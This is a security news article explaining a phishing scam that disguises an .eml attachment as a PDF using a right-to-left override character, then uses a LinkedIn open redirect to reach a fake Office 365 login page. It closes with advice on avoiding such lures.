Look carefully at the screenshot below and you’ll notice that while Microsoft Windows says the file attached to the phishing message is named “lme.pdf,” the full filename is “fdp.eml” spelled backwards. In essence, this is a .eml file — an electronic mail format or email saved in plain text — masquerading as a .PDF file.

“The email came through Microsoft Office 365 with all the detections turned on and was not caught,” the reader continued. “When the same email is sent through Mimecast, Mimecast is smart enough to detect the encoding and it renames the attachment to ‘\_\_\_fdp.eml.’ One would think Microsoft would have had plenty of time by now to address this.”

Indeed, KrebsOnSecurity first covered RLO-based phishing attacks back in 2011, and even then it wasn’t a new trick.

Opening the .eml file generates a rendering of a webpage that mimics an alert from Microsoft about wayward messages awaiting restoration to your inbox. Clicking on the “Restore Messages” link there bounces you through an open redirect on **LinkedIn** before forwarding to the phishing webpage.

As noted here last year, scammers have long taken advantage of a marketing feature on the business networking site which lets them create a LinkedIn.com link that bounces your browser to other websites, such as phishing pages that mimic top online brands (but chiefly Linkedin’s parent firm Microsoft).

The landing page after the LinkedIn redirect displays what appears to be an Office 365 login page, which is naturally a phishing website made to look like an official Microsoft Office property.

In summary, this phishing scam uses an old RLO trick to fool Microsoft Windows into thinking the attached file is something else, and when clicked the link uses an open redirect on a Microsoft-owned website (LinkedIn) to send people to a phishing page that spoofs Microsoft and tries to steal customer email credentials.

According to the latest figures from **Check Point Software**, Microsoft was by far the most impersonated brand for phishing scams in the second quarter of 2023, accounting for nearly 30 percent of all brand phishing attempts.

An unsolicited message that arrives with one of these .eml files as an attachment is more than likely to be a phishing lure. The best advice to sidestep phishing scams is to avoid clicking on links that arrive unbidden in emails, text messages and other mediums. Most phishing scams invoke a temporal element that warns of dire consequences should you fail to respond or act quickly.

If you’re unsure whether a message is legitimate, take a deep breath and visit the site or service in question manually — ideally, using a browser bookmark to avoid potential typosquatting sites.

Tag

#web